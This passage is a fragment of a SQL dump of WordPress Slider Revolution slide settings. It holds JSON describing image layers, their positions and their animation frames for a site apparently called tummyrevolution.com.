8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"141px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"141px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-278px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2000,\"start\":2100,\"startRelative\":-180,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 9\",\"alias\":\"Parce paprike\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-4.png\",\"imageId\":2541},\"size\":{\"width\":{\"d\":{\"v\":\"167px\",\"e\":true},\"n\":{\"v\":\"167px\"},\"t\":{\"v\":\"167px\"},\"m\":{\"v\":\"167px\"}},\"height\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"160px\"},\"t\":{\"v\":\"160px\"},\"m\":{\"v\":\"160px\"}},\"originalWidth\":167,\"originalHeight\":160,\"aspectRatio\":{\"d\":{\"v\":1.04375},\"n\":{\"v\":1.04375},\"t\":{\"v\":1.04375},\"m\":{\"v\":1.04375}}},\"position\":{\"x\":{\"d\":{\"v\":\"1593px\",\"e\":true},\"n\":{\"v\":\"1593px\"},\"t\":{\"v\":\"1593px\"},\"m\":{\"v\":\"1593px\"}},\"y\":{\"d\":{\"v\":\"276px\",\"e\":true},\"n\":{\"v\":\"276px\"},\"t\":{\"v\":\"276px\"},\"m\":{\"v\":\"276px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":350},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2200,\"start\":350,\"startRelative\":350},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2200,\"start\":350,\"startRelative\":350},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-450,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(8,4,1,'{\"title\":\"first\",\"bg\":{\"type\":\"solid\",\"color\":\"#eff0ea\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"5\":{\"text\":\"Image 5\",\"alias\":\"Cvece\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic8.png\",\"imageId\":3227},\"size\":{\"width\":{\"d\":{\"v\":\"647px\",\"e\":true},\"n\":{\"v\":\"487px\",\"e\":true},\"t\":{\"v\":\"487px\"},\"m\":{\"v\":\"381px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"653px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"492px\"},\"m\":{\"v\":\"385px\",\"e\":true}},\"originalWidth\":647,\"originalHeight\":653,\"aspectRatio\":{\"d\":{\"v\":0.9908116385911179},\"n\":{\"v\":0.9908116385911179},\"t\":{\"v\":0.9908116385911179},\"m\":{\"v\":0.9908116385911179}}},\"position\":{\"x\":{\"d\":{\"v\":\"-64px\",\"e\":true},\"n\":{\"v\":\"502px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"-100px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"221px\",\"e\":true},\"n\":{\"v\":\"9px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":870},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1570,\"start\":870,\"startRelative\":870},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1570,\"start\":870,\"startRelative\":870},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":560,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 9\",\"alias\":\"Leaf 2\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic2-1.png\",\"imageId\":3234},\"size\":{\"width\":{\"d\":{\"v\":\"913px\",\"e\":true},\"n\":{\"v\":\"788px\",\"e\":true},\"t\":{\"v\":\"605px\",\"e\":true},\"m\":{\"v\":\"209px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"279px\",\"e\":true},\"n\":{\"v\":\"241px\",\"e\":true},\"t\":{\"v\":\"185px\",\"e\":true},\"m\":{\"v\":\"64px\",\"e\":true}},\"originalWidth\":1021,\"originalHeight\":312,\"aspectRatio\":{\"d\":{\"v\":3.2724358974358974},\"n\":{\"v\":3.2724358974358974},\"t\":{\"v\":3.2724358974358974},\"m\":{\"v\":3.2724358974358974}}},\"position\":{\"x\":{\"d\":{\"v\":\"468px\",\"e\":true},\"n\":{\"v\":\"345px\",\"e\":true},\"t\":{\"v\":\"-15px\",\"e\":true},\"m\":{\"v\":\"266px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"179px\",\"e\":true},\"n\":{\"v\":\"169px\",\"e\":true},\"t\":{\"v\":\"269px\",\"e\":true},\"m\":{\"v\":\"166px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":750},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1690,\"start\":750,\"startRelative\":750},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1690,\"start\":750,\"startRelative\":750},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":470,\"start\":3000,\"startRelative\":560,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Leaf1\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic2.png\",\"imageId\":3229},\"size\":{\"width\":{\"d\":{\"v\":\"1021px\",\"e\":true},\"n\":{\"v\":\"454px\",\"e\":true},\"t\":{\"v\":\"454px\"},\"m\":{\"v\":\"330px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"312px\",\"e\":true},\"n\":{\"v\":\"139px\",\"e\":true},\"t\":{\"v\":\"139px\"},\"m\":{\"v\":\"101px\",\"e\":true}},\"originalWidth\":1021,\"originalHeight\":312,\"aspectRatio\":{\"d\":{\"v\":3.2724358974358974},\"n\":{\"v\":3.2724358974358974},\"t\":{\"v\":3.2724358974358974},\"m\":{\"v\":3.2724358974358974}}},\"position\":{\"x\":{\"d\":{\"v\":\"-54px\",\"e\":true},\"n\":{\"v\":\"194px\",\"e\":true},\"t\":{\"v\":\"-134px\",\"e\":true},\"m\":{\"v\":\"-38px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"169px\",\"e\":true},\"n\":{\"v\":\"-290px\",\"e\":true},\"t\":{\"v\":\"113px\",\"e\":true},\"m\":{\"v\":\"165px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 